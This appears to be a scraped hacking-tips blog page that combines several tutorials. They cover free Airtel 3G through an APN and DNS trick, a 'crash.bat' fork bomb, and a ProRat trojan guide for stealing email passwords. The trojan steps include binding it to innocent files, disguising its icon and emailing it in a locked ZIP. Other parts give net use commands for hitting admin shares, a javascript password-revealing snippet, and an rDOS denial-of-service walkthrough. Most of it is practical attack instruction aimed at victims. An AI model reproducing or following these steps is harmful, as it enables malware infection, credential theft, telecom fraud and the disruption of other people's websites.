Airtel Free 3G Hack : Use Free Airtel 3G Internet For Your Computer


       Airtel 3G Hack : Free Airtel 3G Internet For Your Computer

Step 1: Connect via AIRTELMMS.COM(MOST IMPORTANT)..

IF U WANT IT EASY THN GO TO DEVICE MANAGER..SELECT THE MODEM..IN ADVANCE TAB..IN COMMAND SIMPLY PASTE { +CGDCONT=1,"IP","AIRTELMMS.COM" } WITHOUT BRACKETS

Step 2: CREATE A DIALUP CONNECTION....

Step 3: IT WILL CONNECT...AS NO NETWORK ACCESS

Step 4: GO TO CONNECT TO..U WILL SEE CONNECTED...

Step 5: RIGHT CLICK ...LEFT CLICK PROPERTIES

Step 6: GO TO NETWORKING TAB

Step 7: CHECK ALL THE CHECKBOXES

Step 8: CLICK ON INTERNET PROTOCOL VERSION(TCP/IP)

Step 9: CLICK ON PROPERTIES

Step 10: SELECT USE THE FOLLOWING DNS SERVER ADDRESSES

Step 11: ENTER ANY FREE DNS SERVER..I RECOMMEND
156.154.70.1
202.138.96.3


Step 12: CLICK OK

Step 13:AGAIN OK

Step 14: A MSG APPEARS " SETTING WILL TAKE PLACE NEXT TYM U DIAL IT" CLICK OK

Step 15: GO TO START> CONNECT TO > DISCONNECT

Step 16: RECONNECT

Step 17: OPEN ANY WEBSITE ...........Enjoy Free Airtel 3G...

Above trick works at any balance with No Balance Deduction...

CRASH A COMPUTER USNIG SMALL PROGRAM.





1) Open notepad

 2) type the following code ::

start
crash.bat


3) u must save it as crash.bat

4)now hit enter in that file..

 then :innocent::innocent::innocent::

NOTE: u have to save that filename as u entered in that 2 nd line of the code..dont fear...its not a threat... it simply will open infinite number of cmd prompts... 

How to Hack E-Mail Account Password - Email Hacking Software

How to Hack E-Mail Account Password - Email Hacking Software
Now you know that there are many ways to hack email password, like bruteforcing, social engineering or Reverting, but the main two methods used to hack email passwords are Remote Keylogging and Phishing. In this article i'll show you how to hack email account password using keyloggers and trojans. Here I am demonstrating using PRORAT trojan. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors are same. Pls make note that all these hacking tools and softwares are detected by antivirus. You have to uninstall or close you running antivirus first. Now we can start.

How to Hack Email Account Passwords Using ProRat?

1. First of all Download ProRat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be "pro".

Download ProRat here: http://www.prorat.net/downloads.php

2. Open up the program. You should see the following:


3. Next we will create the ProRat Trojan server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options


5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

Here is a quick overview of what they mean and which should be checked:


6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. A good suggestion is a picture or an ordinary text document because that is a small file and its easier to send to the people you need.


7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files, because it is cryptable and has icon support, but exe’s looks suspicious so it would be smart to change it.


8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.


9. After this, press Create server, your server will be in the same folder as ProRat. A new file with name "binded_server" will be created. Rename this file to something describing the picture. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.

Very important: Do not open the "binded_server" file on your system.

10. You can send this trojan server via email, pendrive or if you have physical access to the system, go and run the file. You can not send this file via email as "server.exe", because it will be detected as trojan or virus. Password protect this file with ZIP and then email it. Once your victim download this ZIP file, ask him to unlock it using ZIP password. When the victim will double click on the file, he will be in your control.

11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.

Once the victim runs the server on his computer, the trojan will be installed onto his computer in the background. The hacker would then get a message telling him that the victim was infected. He would then connect to his computer by typing in his IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to the victims computer and have full control over it.


12. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all victim's computer files, he can shut down his pc, get all the saved passwords off his computer, send a message to his computer, format his whole hard drive, take a screen shot of his computer, and so much more. Below I’ll show you a few examples.


13. The image below shows the message that the victim would get on his screen if the hacker chose to message him.


15. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.


As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.

Cmd hacking commands


                                      Cmd hacking commands 


I am Sure u guys Know All these commands.... I want to Help The Beginers.. So i am Posting This....

Useful Things to do on CMD!

First, open your Network Connection and right click and select Properties. Then Select TCP/IP and click on Properties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS.

Now back to the main Local Area Connection window, select File and Print Sharing for Mic*ft Networks and hit enter.

This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.

First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).

In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, off course... you know the drill).

Back to commands:

nslookup
net view
net use
net user
ping
tracert
arp
route
nbtstat
netstat
ipconfig


In case you don't know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.

Lets start easy...

1) ping : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the "ping" command.

ping x.x.x.x (x is the IP address)

or

ping http://www.whatever.com (http://www.whatever.com is the website you want to ping, but you don't know the IP)

OBS: Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down.

2) nslookup : This command has many functionalities.
One is for resolving DNS into IP.
Lets say you know the website URL but you don't know its IP(and you want to find out).

nslookup http://www.whatever.com (http://www.whatever.com is the website you want to find out the IP)

Now, another really nice function of nslookup is to find out IP of specific Mail Severs

nslookup (enter)
set type=mx (enter)
yahoo.com

This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn't it?

OK, now why would you want to have an IP of a mail server?
To send spoofed mail to your friends or even for SE.
In case you looking for "How to spoof email", then look for my "How to spoof email tutorial" http://www.infowar.com/forums/showth...&threadid=2360

3) tracert : This command will give you the hops that a packet will travel to reach its final destination.

OBS: This command is good to know the route a packet takes before it goes to the target box.

tracert x.x.x.x (x is the IP address)

or

tracert http://www.whatever.com (http://www.whatever.com is the website you don't know the IP)

4) arp : This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.

arp -a

5) route : This command will show you the routing table, gateway, interface and metric.

Code:
route print


6) ipconfig : This command will show tons of very helpful things.
Your IP, gateway, dns in use.

Code:
ipconfig
or

Code:
ipconfig /all

this command will give all that info but for all networks you might have it.

Also, in case you have a dynamic IP and want to change it, then type...

Code:
ipconfig /release (this will release your IP)

ipconfig /renew (this will renew your iP)

OBS: Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don't do anything stupid.

7) netstat : This command will show you connection to your box.

Code:
netstat

or

Code:
netstat -a (this will show you all the listening ports and connection with DNS names)
netstat -n (this will show you all the open connection with IP addresses)
netstat -an (this will combined both of the above)

net view x.x.x.x or computername (will list the available sharing folders on the target box)


Now some hints:

Code:
net use \ipaddressipc$ "" /user:administrator

(this command will allow you to connect to the target box as administrator)

Now if you want to connect to the target box and browse the entire C drive, then use this command:

Code:
net use K: \computernameC$
(this will create a virtual drive on your "my computer" folder)

OBS: Keep in mind that this will only works if the target box doesn't have an administrator password set.

And least but not last, the "help" command.

Quote:
whatevercommand /help

or

Quote:
whatevercommand /?


This command will help you to understand what it does and all the switchs available for each command.
Very useful if you know the command, but forgot the right switch.


 hints :: HACKING IS NOT SO EASY SO GUYS BEFORE HACKING READ THE ARTICLES CAREFULLY  ANN FULLY THE TRY TO HACK...

Bypass Compulsory registration


Tonight when I am surf the internet then i am found a site who help you bypass the Compulsory
Registration for enter the website.

This site provide you many user id with password by which use you enter in the website and enjoy free surfing without registration.

link: http://bugmenot.com/

How to View Hidden Password behind ****

How to View Hidden Password behind ****


You can use this script when someone has checked the remember me button in the login form of any website and to reveal password from that saved asterisk or encrypted password.

After opening the web page paste the JavaScript given below in the address bar and hit enter :

javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;

%20F%20=%20document.forms;%20for(j=0;%20j

%20{%20f%20=%20F[j];%20for%20(i=0;%20i

%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)

%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if

%20(s)%20alert(%22Passwords%20in%20forms%20on%20this

%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are

%20no%20passwords%20in%20forms%20on%20this

%20page.%22);})();



DOS TUTORIAL How to crash small websites using RDOS



                                              DOS TUTORIAL
                  How to crash small websites using RDOS


Have you ever wanted to DOS attack on a website. Here I am going to write about a tool which is really helpful but it wouldn't be effective on big servers.


NOTE: Please do not try to this tutorial to harm any other's website. I will not be responsible in any case. If you are not agree, please leave this website without reading further tutorial

You need:

1. Port Scanner : http://www.softpedia.com/get/Network-Tools/Network-IP-Scanner/Advanced-IP-scanner.shtml

2.  rDOS : http://www.ziddu.com/download/14061252/rDos.zip.html

3. Ip Hiding tool : http://www.ziddu.com/download/13388927/Quick_Hide_IP_1.0_portable.rar.html

Follow these steps:

1: First of all you need to know the IP address of the website you want to crash.
Use ping command in windows to get the ip address of the website.
open CMD and enter ping www.website.com
see the snap :


Now you have the IP address of the website.

2: Now use Port scanner to check whether PORT 80 is open or not. If PORT 80 is not open choose another website to hack :P
otherwise you can crash this website.

3: Now open your rDos. Enter your victims ip that you got from step 1.
It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work.

Hints : 1 :: After entering the IP..it will do all work, you don't need to do anything.
          2 :: This kind of hacking tools will always shown as virus by antivirus... disable antivirus before try